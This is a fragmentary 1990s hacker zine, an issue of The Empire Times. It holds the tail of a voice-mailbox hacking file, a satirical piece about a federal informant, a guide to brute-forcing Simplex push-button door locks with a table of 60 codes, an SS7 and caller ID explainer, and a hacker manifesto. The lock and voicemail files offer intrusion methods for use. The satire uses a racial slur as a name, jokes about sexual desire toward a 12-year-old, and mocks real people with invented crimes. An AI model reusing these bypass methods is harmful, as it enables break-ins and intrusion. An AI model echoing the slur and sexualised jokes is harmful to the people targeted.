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%%%%%%%%%%%%%%%%%%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T H E   E M P I R E   T I M E S                   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-------------------------------                   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The True Hacker Magazine                       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                                                                    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 September 13th, 1994  Issue 4                                           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%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%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sues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                                  Author           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X. Introduction                                albatross            3k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1. The Cyber-punk Image                        firefly              7k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. AT&amp;T Definity System 75/85                  erudite             15k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. How to get free Internet                    Pud C0ur13r         14k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4. The Octel VMB System                        da telcopimp        20k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5. My Life as a Narc...                        noelle              10k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. Hacking Simplex Locks                       erudite              3k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. SS7 / Caller ID Discussion                  grendal              6k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. Don't Tell us Our Name                      erudite              3k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Founder: Albat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  Organizer: Armi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Contributors: Da Telcopim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Erud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Firef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Grend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Noel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PuD Cour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Special Thanks: AT&amp;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Seven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-=- The Empire Times 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es it is true. The Empire Times is back online and read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ttle rok -n- roll. The plan is to bring back what appear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from the underground world. The Times will go into detail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s of Cellular fone phreaking to the personal lives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kers which we all know and l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believe this issue will spark the intrest of those wh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cyber-potatoes and those who have yet to realize what a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s all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is time for the Hacker Klan to unite and sha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that we can expand our realm of control over the growing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e love so much. Just think how much money is spent to keep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systems which (as we all know) never works. I have always belie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f there is a way for a regular user to access a system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way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ways use your brain as to the capablities of the ag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re our to stop us, such as the FBI, S.S., and the Milit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obtaining 'root' at sites, always remember to hide your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system. Check for log files, see what wrappers and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n jobs which might be running to catch you. Those who prevail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be known as 'Elite'. Those who fail just didn't learn the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rade fast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ust remeber that we are building a MAFIA on the InterNet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ant it to succeed, then YOU know what has to be done. S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inds growing and those electrons f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Virginia Crue:   If the South is to rise again, Ya'll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ones that'll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Maryland Crue:   We have more Net access than any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ake sure that ya'll keep it lik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moke it like a NeckB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D.C. Crue:       I've never see so many hacked outdia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BX's. Keep it that way. Don't 4 get your 9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'm only trying to build an Empi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l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-=- The Empire Times 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olume 2, Issue 4, File 1 of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The Cyberpunk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by fire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's a new flick that they are showing at schools in the area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. It's one of those documentaries that is produced exclusive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ucators that targets a certain culture and proceeds to slander agains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yberpunk" is such a movie. I had the unfortunate luck to sit through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eneral education program in college last semester. That was bad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.but then I had to show it to a class this summer and then spark discu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it when I disagreed with the entire theme of the movi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movie "Cyberpunk" was a documentary that showed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 and continued the media's hype of the so-called "cybercultu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m was well-done, and well-organized, but I disagree with w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are the film's themes about the "computer gener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.k.a.: cyber-punks). Not to mention the fact it was written entire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mputer-esque" with techno music, rapid-picture imagery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formation age" fads. This paper will discuss the term "cyberpunk" itse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 observations about this culture, and conclude with the true na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gen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erm cyberpunk, coined by William Gibson in his Neuromancer boo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literary and now, thanks to the media, an overused term used to descri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type of "console cowboy" from a computer programmer to a malic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explorer, to someone who sees a Gibson-esque future ru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, to someone who dresses in leather, and carries a digital p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rm "punk" usually refers to someone against the current cultural n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ociety. The so-called cyberpunks are considered the small seg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iety that is against the current norms of "regular people". Wel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th of the matter is that these "cyber-dudes" have grown up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, digital games, and electronic tools in the classroom and work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t their fault that computers have simplified many redundant tas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iety? Is it these people's fault that computers now help fly aircra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cars, improve international communication? N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computer generation is simply the first generation to pione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radically new concept of existence. While our forefathers saw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linear perspective, we see them in a virtual reality that can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nonlinear environment depending on our virtual vantage point. Timo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y would say this is "consciousness-expansion".  Consider your par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ent of television or the superhighway across your home state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s saw it as revolutionary, and possibly frightening that automob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 "drive" in 6-8 lanes of 55mph traffic across the nation. They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w the political and Orwellian problems with having a video receiver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ing rooms that could broadcast political messages. But they adap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w up with it, while their parents looked on in amazement. The same ho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with the electronic age. My generation grew up with Atari, Ap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, and modems. We are used to "driving" with multiple path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ly -- parallel processing -- our lives, and utilizing the v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that information or data takes these days to further advance our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llustrates how those in power of any sort -- political, liter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, business -- see this generation, as a band of people who use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to live their lives. Well, the television was strange to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dmother, but she adapted -- as my mother grew up with it --, and s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eneration of leaders adapt as our generation of people grow u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. The difference with this computer generation is that we dea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much information at such a rapid pace, that those who look on us (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ymakers and journalists) cannot keep up with it...hence the fear of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don't know. "Cyberpunk" sounds evil. The unknown is evil.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nobody understands the cyber-culture, those that do are therefore ev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 societal algebra.  The movie is full of stereotypes. Firstly,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yberpunk standard for music. People think techno is the music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age because it is fast and computer-generated. False. Granted,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who like techno like computers, but a history book of 2020 sh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the 1990s' cyber-culture liking techno in the same way as 18th cent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torians enjoyed the waltz. Outstanding on-line magazine UXU-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philia mentions that the cyber-culture likes any form of music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only computer-generated tunes. I associate with hackers, and peop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 calls "cyberpunks". Our music ranges from hard rock and metal to mov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tracks to top forty to reggae, and some techno. Yet, throug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e, viewers are led to believe that fast techno is the "music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people." Granted, a "rave" is an all-night computer-controlled tech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 is the climactic part of being a part of a cyberculture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ic of the entire culture of computer-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was "lotsa leather". Again, another stereotype. Tru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ssic street punk wore combat boots and a leather jacket, but to impl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how an entire subculture dresses is absurd! To dispel this myt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t the movie on its own level of stereotyping, go to any rave, which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the climactic event in the cyberculture. The fashion range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lime to the ridiculous, from exotic to erotic, from jeans and T-shir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ther and handcuffs. Mostly people dress the way they go to a dance cl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ople they interviewed in the movie were interviewed at a conven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other public place, where they are dressing to make an impression.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someone wears leather at a convention or on a documentary tape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mean he/she represents the entire culture being profiled, or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dresses like that regularly. I know of very few hard-core cyber-k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dress that way. I frequently wear shorts, jeans, t-shirts and turtlen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my accessories is a pager and ATM card. Gee. According to Cyberpu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not be a member of the cyberculture, since I don't own a leather j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have long h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ough ranting. I've got better things to do. But I just though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ting that this flick is shown as an (and meant to be an) " obj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ucational tool" to college students to show them about compu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ciety, but portrays them as evil, conniving th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es on next topic: Business Intelligence? or Social Engineer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-=- The Empire Times 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Volume 2, Issue 4, File 2 of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T&amp;T Definity System 75/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by erud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T&amp;T Definity System 75/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Communications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escription &amp;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me introduce you to the AT&amp;T Definity System 75/85.  This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s a product of the merging of the AT&amp;T System 75 and System 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tectures.  The name Definity came from the two words "definitive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finit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me also tell you that there are many different communication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here. (Merlins, AT&amp;Ts) Many many many, I couldnt name them all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&amp;T systems are nice.  I enjoy working with them, and I hope you en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ystem is an advanced business communications system.  A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Protocol (DCP) allows data communication through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equipment connected to the digital switch.  This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to handle data and voice communications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can handle up to 1600 lines that supports all digital, hybr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nalog terminals and equipment.  Up to 400 trunks, and up to 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Call Distribution (ACD) Agents.  The Data switching capacity i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800 digital data endpointsb, and 160 integrated and combined pooled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Digital Data Endpoints includ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510D Personal Terminal or 515-Type Business Communications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7404D Termi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7406D or 7407D Equipped with optional Data Modul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Asynchronous Data Units (ADU) (DCE type device that has rs232c interf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Digital Terminal Data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3270 Data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Internal Data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Trunk Data Modules (Modul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Processor Data Modules (Modul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cessor Port Network (PPN) always provides the switch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 (SPE) and port circuits.  An Expansion Port Network (EPN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to increase line size of any system by allowing you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nal port circuits.  The EPN connects to the PPN over a f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c cable that may be up to 1.86 miles remotely situated.  It ma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located adjacent to the PP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ystem may be arranged stand-alone or you can integrate it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vate network.  You can form these types of Netwo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 Tandem Tie Trunk Network (TTT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 Electronic Tandem Network (ET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 Main/Satellit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 Distributed Communications System (D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 Centralized Attendant Service (C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tegrated Services Digital Network Primary Rate Interface (ISDN-PR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it possible for the Definity System to access various priv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network services.  With ISDN-PRI the you can access these serv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 Call by Call Servic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 Private Network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 Information Forw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 Call Identificatio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Connected Number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Connected Party Nam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Calling and Called Number Recor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- Calling and Called Party Nam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ual System is encased in a pair of "cabinets" which have a fi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c link between them.  It is also common to have a stack of abou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abinets" of a smaller size, for different mod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 here is a typical multi-carrier system with a Processor Port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PN) cabinet and Expansion Port Network (EPN) cabi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t          outside trunks   _____ outside privat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oles            and lines    /        data transmission equipm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                    \    /          analog switched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\      fiber optic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|      connetion     |  |         __ business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+---------/~\--------+--+       /    termi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AT&amp;T    | |   AT&amp;T    |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DEFINITY  | | DEFINITY  +------'                      ___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+  SYSTEM   | |  SYSTEM   +--------&lt;&gt;------[audix]    /    termi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|  75/85    | |  75/85    |   modular data  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|___________| |__________+|     processor     ____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   |   |                 |                   |    +'optional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l  |   |                 +-------&lt;&gt;----------+    | computer or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/    +-------[]-----+,                     |____| management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asynchronous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line     data unit    \__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terminals                    termi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an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lot of voice features and services, in fact, too many to list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o a run down on all the interesting and useful features and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s many Voice Management, Data Management, Network Services,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ment, Hospitality Services, and Call Management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Attendant Display: Contains useful call related informatio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attendant can use to operate the console more effici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Audio Information Exchange Interface (AUDIX): This interface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inside system users and remote callers to edit, recieve, s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, and forward voic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Authorization Codes: A means to control user privileges throug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Automatic Incoming Call Display: Shows identity of remote caller and re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the display cons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Class of Restriction: Defines up to 64 classes of user restr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Conferenc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endant Conference: Allows Attendant to construct a conferenc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rminal Confernce: Allows remote user to construct a conference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ttendant as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Data Privacy: This, when activated by user, protects analog data call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interrupted by any of the systems overriding features, and den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ility to gain access to, and or superimpose t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Data Restriction: This feature is the same as Data Privacy, except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issued by the administrator to a certain extension # for indic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dicated private data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DCS Call Forwarding All Calls: This is the voice forwarding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DCS Distinctive Ringing: This is simply a distinctive ringing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Dial Access: This is simply the package of features that allows any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to dial anyone else, such as the attendant cons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DS1 Tie Trunk Service: This service provides a digital interfa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trunks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 Voice Grade DS1 Tie Tru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 Alternative Voice/Data (AVD) DS1 Tie Tru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 Digital Multiplexed Interface (DMI) Tie Tru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 Central Office (CO) Tru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 ISDN-PRI Tru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 Remote Access Tru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 Wide Area Telecommunications Service (WATS) Tru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Facility Test Calls: Provides voice terminal user who is capable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and functions that is used for maintenance testing.  Such as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ystem tones, access to specific trunk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: AT&amp;T designed the Facility Test Calls Feature for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purposes only, and system maintenance.  When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dministered, AT&amp;T claims that the customer is responsi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ll security items, and secure system from unauthorized us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nd that all users should be aware of handling access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T&amp;T claims they will take no responsibility for p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admin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Hunting: The internal hunting feature is very nice, as you probably kn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rings down if busy, or if it recieves a dial time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Information System Network Interface (ISN): AT&amp;T ISN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switched local area network that will link with mainfr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tations, personal computers, printers, terminals, storage dev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mmunication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Integrated Services Digital Network Primary Rate Interface (ISDN-PRI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terface allows connection of the system to an ISDN Network by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SDN frame format called P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Inter-PBX Attendant Calls: Positions for more than one branch, an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ch has a Listed Directory Number (LD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Modem Pooling: Switches connections of digital data end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Network Access (Private): Connect to the following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 Common Control Switching Arrangement (CC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 Electronic Tandem Network (ET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 Enhanced Private Switched Communications Service (EPS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 Tandem Tie Trunk Network (TTT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 Software Defined Network (SD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Network Access (Public): Access to public net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Privacy: Protects from others bridging into their exten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Remote Access: This lets you access the system remotely, again, AT&amp;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t want to take responsibility for anything that is abus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Restrictions: There is a large list of restriction features that I'm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come in han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Service Observing: Allows high access users to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calls, again, AT&amp;T does not want to take any legal fees on miss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Transfers: Allows any user to do an attendant call transfer withou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dant's as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comes with swithced services software, administrativ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intenance software.  All running on a real-tim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Switched Services Software: This Software provides all the calling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rvices.  This also is responsible for relaying any informa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ol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Administrative Software: This Software is needed to run administr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s, and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Maintenance Software: The Maintenance Software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everything run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dmin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Access Code" you will encounter on these systems is a 1, 2, or 3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. The pound (#) and star (*) keys can be used as the first digi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.  Below you will see a typical Screen Format taken from one of my lo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side you can see what the administration Screens look and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 Page 1 of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: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: _____       Lock Messages: _      COR: _     Room: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: ___________ Security Code: ____   COS: _     Jack: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 Coverage Path: ___              Cable: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WC Reception? _____  Headset? _  Coverage Msg Retrieval?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WC Activation? _  Auto Answer? _        Data Restriction?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rect Notification? _        Idle Appearance Preferences?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OL/TEG Call Alerting?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ata Module? _           Restrict Last Appearance?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play?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REVIATED DIAL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st1: _____        List2: _____        List3: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ASSIG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: _______                     6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: _______                     7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: _______                     8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: _______                     9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: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Maint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the Maintenance section, where you can see where the erro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ged, where all the alarms are sent, printed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3 different types of ala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Major Alarms (Critical Damage, requires immediate atten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Minor Alarms (Errors, still operable, requires a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Warning Alarms (no noticeable degradation of service, not repo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ole or INA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rror log is reported and can be viewed at The Manager Termi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 as the alarm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Acrony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U     Asynchronous Data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X   Audio Information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     Class of Restr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     Class of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P     Digital Communications Prot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I     Digital Multiplexed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N     Expansion Port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DN    Integrated Service Digital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PN     Processor Post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DN    Packet Switching Dat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most of the Tones, mostly either interesting ones or oftenly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es the System.  Here are the tones, the frequencies, and the mod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ne                   Frequency         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                  ---------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Back 3          2225 Hz            3000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Back 5          2225 Hz            5000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dging Warning       440 Hz             1750 on, 12000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650 on; rep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y                   480 Hz + 620 Hz    500 on, 500 off; rep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              440 Hz             200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             440 Hz             200 on, 200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dant             440 Hz             200 on, 200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ity Call          440 Hz             200 on, 200 off, 200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200 off, 200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 Back             440 Hz + 480 Hz;   900 on (440 + 48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440 Hz             200 on (440) 2900 off; rep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nrt At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ntification       480 Hz &amp; 440 Hz    100 on (480), 100 on (44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&amp; 480 Hz           100 on silen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 Zer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dant Transf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 Calls,           440 Hz             100 on, 100 off, 100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age              440 Hz             600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          350 Hz + 400 Hz    100 on, 100 off, 100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100 off, 100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                  250 Hz + 400 Hz    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ve Override    440 Hz             300 on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cept             440 Hz &amp; 620 Hz    250 on (440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250 on (620); rep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gback              440 Hz + 480 Hz    1000 on, 3000 off; rep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                  480                500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This file was based on the statistics for the AT&amp;T Defi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75/85 (multi-carrier cabinet model) communication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ope you learned something, anywayz, questions comments, system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defaults, where to get manuals, or anything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me (armitage@dhp.com) and I will get back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udite (armitage on i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-=- The Empire Times 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olume 2, Issue 4, File 3 of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How to Get a Free Internet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by PuD C0ur13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know the story.  Your just starting out, and you don't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et account.  And you don't want to pay for one, right?  Well,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tips to getting fre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n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h bleh, you say.  A freenet?!?!@#$  Well, yes, a freenet.  Why n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a mailing address, a gopher, maybe usenet, maybe irc, mayb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added features.  Heck, on some freenets you get a shell account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if you don't get a shell account, there are many ways to get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 shell.  Vi, Veronica, gopher, and many other useful little bug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 is not for telling how to get shell on a freenet, because tha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up another article. But here are some freen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ne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o.nmc.edu                login: vis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fn.ysu.edu                login: vis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net.scri.fsu.edu       login: vis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net.carleton.edu       login: g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net.victoria.bc.ca     login: g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net.lorain.oberlin.edu login: g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net.hsc.colorado.edu   login: g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cat.missouri.edu        login: g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bo.uwasa.fi             login: g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s.net                    login: g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augsburg.edu           login: g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pe.ncm.com                login: g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.ai.mit.edu         login: g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isca.uiowa.edu         login: guest/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red.pc.cc.cmu.edu 8888   login: guest/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elab.ac.runet.edu       login: bbs   (send mail to 'gabe' to access i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axs.com                 login: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.acc.iit.edu         login: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augsburg.edu           login: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bbs.civ.utwente.nl       login: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car.bbb.no               login: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.mty.itesm.mx          login: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drwa.tudelft.nl          login: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a.kaist.ac.kr            login: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.nsysu.edu.tw            login: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ssun11.cis.nctu.edu.tw   login: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dboy.aue.com             login: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y.computing.csbsju.edu  login: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rtz.rutgers.edu         login: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.fdu.edu                login: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adine.hacks.arizona.edu login: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dom.nmsu.edu           login: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ds.kotel.co.kr           login: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iat.org                 login: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bass.st.usm.edu         login: bbs       pass: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tland.bradley.edu      login: bbg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net-in-a.cwru.edu      login: &lt;non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bbs.telecom.uoknor.edu   login: &lt;non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p.isca.uiowa.edu        login: &lt;non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2.pc.maricopa.edu 4228   login: &lt;non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.itd.com 9999            login: &lt;non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x6.aid.no                login: sky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pad.unc.edu          login: la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l.calstate.edu           login: a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st.unomaha.edu         login: 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e.bc.ca                  login: co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ords.bc.ca            login: co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tcosy.cns.vt.edu          login: cosy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bbs.nersc.gov            login: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o.ndsu.nodak.edu        login: new       pass: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sun.oulu.fi             login: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.city.ac.uk            login: mono      pass: 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ton.dep.anl.gov         login: coco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eth.ethz.ch answer at prompts: #         call c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TERMSERV      call ava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login:      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 Pen or School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know that in Virginia, there is a semi-internet provider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 Pen.  I call it semi, because only teachers usually get a shell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account will only last for a year, so then you have to subscrib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coun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, your school might have some kind of internet feed.  Try h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with that in any way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an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isn't much to be said on this.  For Delphi, all you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is a Credit Card Number Generator of some sort.  The accou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only last about a day, but you can do it as many times a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real CC number, with real name and address, then you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mi-legit account, but that will probably only last untill that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carding gets his or her bill.  :-)  Experiment.  Call up you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r, and try carding it.  Chances are, it w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decservers are hooked up to the internet.  The only wa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find them is to scan for them.  When you do find a decserver or two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how services' command.  If you see anything that is remotely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elnet' or 'rlogin' then play around with it.  You might be able to tel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site on th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00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are two kinds of 1800 Internet.  One is a 1800 numb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kind of like a decserver, except its not.  It lets you telne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server though, but it only lets you use IP numbers.  I have only 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with a very few of these "decservers", because 1800 have ANI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kind of telnet gets used to hell, so it doesn't last very long.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I knew got called by the authorities for using a 1800 "decserv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s not really illegal to use, because you didn't have to hack i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n into it.  Its just there.  But I wouldn't take that legal advi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t,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other kind of 1800 Internet is where you can call up a uni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n account through the 1800 number.  Delphi has this, as does IIA.o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space.net's number used to be 1800-833-6378, but I hear that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lain Hacking Goo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rute it away baby.  You could also take that delphi account you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ed, finger a site, and brute it that away.  Bruting works about 2%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now, but this script will brut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Unix telneting brute force hacker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&lt;sys/wait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include &lt;signal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Set this according to the path and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filename where telnet is located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TELNETPATH "/usr/ucb/teln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The Following are set to default on a SunOs login format.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You may need to change these for other systems.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LOGINSTRING  "login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PASSSTRING   "Password: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GOTONESTRING "Last log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 You won't need to edit anything after this point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GETC(c)  read(readfd,&amp;(c),1)    /* Functions to read and write pip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PUTC(c)  write(writefd,&amp;(c)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define PUTS(s)  write(writefd,(s),strlen(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*HOST[80];         /* String: Holds connect to host on telne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DBUG = 0;            /* Switch: for Debug/Background mod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EOO = 0;             /* Switch: Exit after 1st fin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*afilename[80];    /* String: filename to account lis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*pfilename[80];    /* String: Holds filename to password lis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*ofilename[80];    /* String: Holds filename to output fil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account[10];       /* Strings: Hold account/pw for attempt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password[1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*accounts;         /* File pointer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*password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*fou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ch;                /* General purpos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buf[80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cou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p1[2], p2[2];        /* Streams for the process pipe connection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writefd, readfd;     /* Handles for the pipe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Handles the death of the telnet process due to a timeout on connection.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Restarts a telnet process and reconnects to the host                       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#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*death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(1 == 1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wait3(NULL, WNOHANG, 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ignal(SIGCLD, deat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witch (fork(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se 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up2(p2[0],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dup2(p1[1], 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execl(TELNETPATH, "telnet",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intf("Exec Failed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defa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UTS(HOS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ait3(NULL, WNOHANG, NUL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gnal(SIGCLD, deat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Error exit routine/Help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 help(pa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\nUsage: %s &lt;address&gt; -a&lt;account list&gt; -p&lt;password list&gt; -o&lt;output&gt;\n", par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Flags:  -d  (Debug/Run in foreground)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f("        -1  Exit after first find\n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MAIN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(argc, arg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     arg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    **argv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(argc =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elp(argv[0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rcpy(HOST, argv[1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(count = 2; count != argc; count++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if (argv[count][0] != '-'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intf("\n:: Invalid Command Line ::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help(argv[0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ch = argv[count][1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switch (ch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case 'a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(!afilename[0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trcpy(afilename, argv[count] + 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case 'p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(!pfilename[0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trcpy(pfilename, argv[count] + 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ase 'o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f (!ofilename[0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trcpy(ofilename, argv[count] + 2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case 'd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BUG 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case '1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OO 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defau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rintf("\n:: -%c: Unknown option ::\n\n", c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help(argv[0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le (!afilename[0]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printf("AccountList: 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ets(a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le (!pfilename[0]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printf("PasswrdList: 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ets(p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le (!ofilename[0]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printf("Outfile: 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ets(o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intf("\nHOST: %s", HOS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intf("\nAccountFile: %s", a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intf("\nPasswrdFile: %s", p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intf("\nOutfile: %s", o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intf("\nDebug: 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(DBUG =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intf("Off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intf("O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intf("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rcpy(buf, HOS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rcpy(HOST, "open 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rcat(HOST, bu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trcat(HOST, "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intf(HOS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(DBUG == 0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if (fork(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intf("\nRunning in the background. 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exi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printf("PID: %d\n", getpid()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gnal(SIGCLD, death);           /* Execute death function when child die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Set up pipes and start telnet child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###########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(pipe(p2) == -1 || pipe(p1) == -1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printf("Error making pipes.=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adfd = p1[0];  /* read from p1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ritefd = p2[1]; /* write to p2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witch (fork()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se -1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intf("Couldnt fork off a child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ret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se 0 :  /* the child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dup2(p2[0], 0);  /* read from p2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dup2(p1[1], 1);  /* write to p1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execl(TELNETPATH, "telnet", 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printf("Exec failed.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exit(-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efault:  /* paren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Open files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############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((accounts = fopen(afilename, "r")) == NULL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printf("ERROR: AccountFile &lt;%s&gt; Not found.\n", a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exi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((passwords = fopen(pfilename, "r")) == NULL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printf("ERROR: PasswrdFile &lt;%s&gt; Not Found.\n", pfilenam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exi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nd = fopen(ofilename, "w+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printf(found, "Trying Host: %s\n\n", bu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flush(foun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UTS(HOST);  /* Send open &lt;host&gt; to telne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le (1) {                /* Loop to capture to buf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if (GETC(ch) &gt; 0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if (DBUG =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utchar(c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buf[count++] = c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f (ch ==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unt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if (strstr(buf, GOTONESTRING) != NULL) {    /* Check for good accoun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unt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fprintf(found, "Account: %sPassword: %s\n", account, pass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fflush(foun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intf("Got one!   Account: %sPassword:%s\n", account, pass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if (EOO =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exit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if (strstr(buf, LOGINSTRING) != NULL) {     /* Check for login promp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unt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strcpy(buf, "XXXXXXXX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if (ftell(passwords) == 0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if (fscanf(accounts, "%s", account) == EOF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printf("End of accounts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brea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strcat(account, "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if (DBUG =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uts(accou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UTS(accou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if (strstr(buf, PASSSTRING) != NULL) {    /* Check for passwd prompt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unt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strcpy(buf, "XXXXXX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if (fscanf(passwords, "%s", password) == EOF) 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strcpy(password, accoun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rewind(password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strcat(password, "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if (DBUG ==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uts(pass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UTS(pass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s That give you shell accounts for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only ones I know of offhand that you can telnet to and get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posf.pa.dec.com          login: axpguest  pass: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space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space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spac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net.cse.fau.edu (not shell, but has alot of other nice thing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phi.com (well, you know, that 5 hours of free internet dea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yx.cs.du.edu              login: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mes.merit.edu           login: um-m-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-net.ann-arbor.mi.us      login: new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one wants to update, or make this t-phile more informational tha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 is, email roach@tmok.res.wpi.ed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-=- The Empire Times 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olume 2, Issue 4, File 4 of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he Octel VMB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by Da TelcoPi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-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-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       /--------/ /--------/ /-------------/ /----------/ /-/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      / /----/ / / /---/  / /-----+ +-----/ / /----/___/ / /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     / /    / / / /   /__/       / /       / +---/      / /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    / /    / / / /              / /       / +---/      / /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   / /____/ / / /___/---/      / /       / /____/---/ / /____/---/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  /________/ /_________/      /_/       /__________/ /__________/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                                           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| k|LLa ak-aSKi by Shadowdancer da TelC()PiMP                             |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-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-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el is a type of VMB system, like Meridian Mail or Audix or whatever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el is not well known and I have recently been abusing these systems i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.  There is one thing that I have noticed about these systems,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good security.  All this inpho was gotten from Octel Voic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ing manual Release 3.0, a woman who works for Northern Teleco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around on systems. So let this voyage into the world of the Octel V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begin.  Ignore all spelling errors, I cant spel worth shit. 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is file is: each section that begins with the # symbol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one of the options from the Main menu, and everything und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take you down level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u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dialups for this system.  There is the backdoor, the Oc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number, and then there is the front door.  The Backdoor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messages and also login to the vmb.  This also goes for the front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well.  The differnece between the front door and the backdoo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ing.  The front door is where you get the personalized greeting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door will pick up and say something to the effect of enter the mail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you wish to leave a message to or press # to indicate t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ilbox on thi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k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really not much to this part.  I have encountered an octel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door where the box number was the same as the password.  I hav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ntered a system where the password was the whole telephone number plu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before it such as the box number was 1234 and the password was 1(pre)123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re all just basic defaults but they are what I have encountere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o do after Logging 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logged in, before you are brought up to the main menu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given some messages about different things maybe a broadcas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your sysadmin or notification of automatically deleted messag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is a list of options you can use at the mai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1. Message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: To hear new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plays all new messages since the las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To review al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play all messages in your mailbox, in the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ie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Re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listening to a message you are able to hit 4 and repl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message.  Commands used during playback will be lis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 Get Envelop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 iformation basically gives you the specs on a messag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ell you whether it came from someone who has a mailbox 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or whether it came from and outside caller.  It will tel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e &amp; time sent, how long it is and if the message is mark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vate, urgent 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: Send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6 and then you will be prompted to make a recording of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message so that the person the message is being forwar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s that it is a forwarded message from you.  After recor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press #.  If you would like to review your comments pres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enter the mailbox or if you don't know that press # to d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: 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what it says.  It erases the message after you list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: R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press 8 record your reply and then press # to te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you are done recording and then press # again to send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record/edit controls during your reply.  Thes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ed later in the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: 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s it says.  This option archives your mess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: Skip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you are listening to the new messages you can press # to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but after you listen to the new messages it plays your sk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over and then your archive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#: Skip to archive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listening to the new messages and you want to ski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d messages just hit ## and you will be taken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: Cancel review of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cancels message review and takes you back to the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used during playback of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Rewinds message 1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: Rewinds to the begining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Pause.  To unpause press 2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Fast-forwards message 10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: Fast-forwards to the end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Plays the message s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 Gives envelop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: Plays the message f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: Levels volume to normal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: Increases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2. Sending messages to other subscribers on the system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of the vmb is quite useful to the actual users of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someone has recieved there messages and read them etc.  They ca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 message to someother person on that same system without having to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front door.  Here are the options that are used during the re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fter the recording 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: Stop recording once you are satisfied with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Replay you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: Re-record your message if you are not satisfied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e-recording you can re-record the whole message or just pa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t.  Use the Recording controls which will be listed la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text.  (NOTE If you are leaving a long message the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fy you with two beeps that tell you your time is almost u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finished recording your message you have the choic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recording the message or delivering it.  There are several way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a destination.  1) box number.  2) subscribers name.  3)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personal distrubution list.  4) a guest or home mailbox number.  (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on in the text we will discuss how to create distribution lis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est and home mailboxes.)  When you are going to give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, instead of the mailbox number, here is the format for enter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-- last, fir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=2,a,b, or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=3,d,e, or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=4,g,h, o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=5,j,k, or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=6,m,n, or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=7,p,q,r, or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=8,t,u, or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=9,w,x,y, or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stance, I was on the same system as you, you could send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MP,Telco = 746783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ark the messages as either urgentor private. After you en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and before you send the message is when you can mark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ways cancel the the option by pressing the option number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Priv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Urg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message conformation you will presented with two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ormation of receipt and notification of non-receipt.  Conform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pt is a system generated message which is sent to you after th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read your message.  Notification of non-receipt is a system gener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that tells you that the subscriber has not listened to you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a certain time fra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Conformation of rece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Notification of non-rece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ed to you could give the system a certain time to deliv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.  This function is known as Future Delive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Future deliv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this option you will be prompted to enter a date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enter the actual date or if the message is to be delivered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k you can specify the day of the wee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Specify the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elect the month. Jan.= 1 and Sept.=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elect the date.  Between 1 and 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et the hour and minutes.  7:00 = 700 and 12:30 = 12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elect 1 for a.m. or 2 for p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Specify the day of the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nter the first two letter of the day, using the chart abov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used to enter in the name of the person on the sys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.= 78 and Fri.= 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elect the hour and minutes using the same format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elect the time of day, a.m. or p.m., using the format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all of the options and getting everything squared awa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w ready to send the message.  Press # to do this.  After this ente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o back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ing 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ing controls are basically identical to play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used while listening to messages.  There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ew commands that are differ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 Resume the recording of a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Edi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: Listen to what has been reco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Pause.  Then press 5 to re-record over the undesired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3. Check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entered this section from the main menu by pressing 3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the identify the subscriber's mailbox number or enter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.  All this option does is tell you whether or not the person you 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 has listened to your mail or not.  If they have not listened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all the way you will not get the receipt.  The system will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message the subscriber has not listened to.  To skip the messag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press # or press * to cancel the Check Rece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4. Personal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is section in the main menu there are 6 options you can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Notification On/Off. 2) Administrative options. 3) Greetings. 4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fication schedule. 5) Mailbox forwarding. &amp; 6)Security Options. (g00d1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levels of menus to this part of the main menu.  But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ry Jane Octel will talk you throught all of the steps...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Notification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basically sets whether system messages are repeat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.  1 = On, 2 =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Administrative options. (Under this level you have many many choi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Password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Personal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ersonal password can be up to 15 digits long.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admin set what is the minimum length required.  Do not fo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assword because then the sysadmin is forced to kil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box and start you up a new one.  The sysadmin will not b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y camper.  But then again sysadmins can eat a dick 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Home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just some password you can give to members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y.  This just lets them send and receive mail like a g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&amp;4: Guest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e of the coolest options of all.  This is ba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ilbox within a mailbox.  You designate a password to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friends and he can leave messages to you and you can le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to him.  But other users on the system cannot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est mai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 Security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someone the option of getting the envelo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the messages in your mai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Group Lists (NOTE You can have a maximum of 15 lists with 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25 mailbox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Creat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Give a two digit number for the list you want to create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to 2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Record the name for the list like "Uhh cool asswip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nter either the mailbox number or the name of the peop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o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o review all the names on the list pres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To exit and save the list press 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want to send a message to a distribution list, enter in the li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when you are prompted to enter in the destination after recor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Edit existing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Delete existing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Review or rename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Prompt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message prompts.  It is like setting up men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bs.  You can choose novice, skilled, expert.  Thi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setting up menus to your li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Standard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rompts are your basic prompts wich go over basic option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sending mail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Extended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mpt gives thorough explanations of commands and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for use of all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Rapid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mpts cover all features but do not give thorough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pla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Date and Time play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tells you the time the message was recieved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turn this on by hitting 1 for on or 2 for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Gree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Personal gree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greeting you get once you have called up the fr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or or you have been transfered to that vmb.  It is ba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for almost all vmbs.  You enter in a message like "Uh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Da TelcoPiMP, leave a fucking message after the beep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choose a standard greeting wich is the Jane Oc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saying that so and so is not in righ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Extended absence gree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reeting just says that you are out for a lengthy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ime and won't be checking messages frequently. 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block option is on when the extended absence gre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 your mailbox will not except messages except f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sysad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: Name reco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 recording of your name which is used to confir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boxes when someone has entered in the number of your mail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so used with the standard gree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: Notification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allows your mailbox to call you at certain times (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s you setup) give you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elect 1 for first schedule 2 for second schedule or 3 for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edu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nter the telephone you want the system to call you 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You will be asked to set up a start/stop time for the out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fication from your mailbox.  You can specify whether it appl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eekdays, weekends or both.  Enter in the time using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as the earlier commands that require you to enter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elect the type of message that activates the notification.  1 = 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Urgent and 3 = Group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elect how soon you want the system to call you after it receiv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message.  1 = Hour, 2 = Hours, 3 = 4 hours, 4 = 1 day, 5 =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and 6 = N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After all of this hassle you can confirm your entries or li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.  1 = Confirm and 2 = Liste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: Mailbox forwarding. (NOTE To have this option work you mus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mailbox created by the sysadmin, for the forwarded messag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p the system where the mailbox has been created for you and se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Establish or change the forwarding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etwork node address? and the forwarding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box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Cancel mailbox forwar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: Confi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: Security options. (huhuhuhuh k00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Turn on access sekurity. (Record your name and the tim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: Turn off access seku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 alittle inpho on this option.  Once access security is on you are as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cord your name and time.  This is so that the next time you log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vmb you will hear "The last mailbox access was by &lt;your name&gt; at &lt;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ntry&gt;."  So the next time you login to the vmb you will hear tha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ecorded the inpho at the begining of the last login.  If you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any inpho you will hear silence.  Ok say you break into a syst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on.  You will have to record that inpho.  But the thing i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know if the person recorded inpho the 